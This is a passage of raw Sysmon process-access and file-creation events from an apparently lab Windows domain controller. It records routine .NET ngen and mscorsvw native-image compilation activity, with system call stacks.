tdll.dll+51791 10341000x80000000000000007176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.044{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.044{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.998{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F302-00000000A301}4344C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:25.373{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6dc-0\XsdBuildTask.dll2021-01-18 13:48:25.373 10341000x80000000000000007200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.216{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.201{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.201{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A9-6005-FB02-00000000A301}1756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.154{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A9-6005-FA02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.154{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A9-6005-FA02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.154{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A9-6005-FA02-00000000A301}3004C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:25.076{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c50-0\XamlBuildTask.dll2021-01-18 13:48:25.076 10341000x80000000000000007211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:26.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-90A3-6005-3001-00000000A301}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:26.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91AA-6005-FD02-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:26.544{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91AA-6005-FD02-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:26.544{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91AA-6005-FD02-00000000A301}5008C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.654{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2A01-00000000A301}3240C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.591{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-91A9-6005-FC02-00000000A301}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.591{59A5CD1D-8E44-6005-0B00-00000000A301}856904C:\Windows\system32\lsass.exe{59A5CD1D-91A9-6005-FC02-00000000A301}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.560{59A5CD1D-90A0-6005-2B01-00000000A301}44362516C:\Windows\system32\conhost.exe{00000000-0000-0000-0000-000000000000}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.560{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:25.560{59A5CD1D-90A0-6005-2A01-00000000A301}32401372C:\Windows\Microsoft.NET\Framework64\v4.0.30319\NGenTask.exe{00000000-0000-0000-0000-000000000000}4136C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.dll+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.DLL+32979|UNKNOWN(00007FF8288A5147) 10341000x80000000000000007217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.622{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.607{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.607{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91AB-6005-FF02-00000000A301}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.326{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91AB-6005-FE02-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.310{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91AB-6005-FE02-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:27.310{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91AB-6005-FE02-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 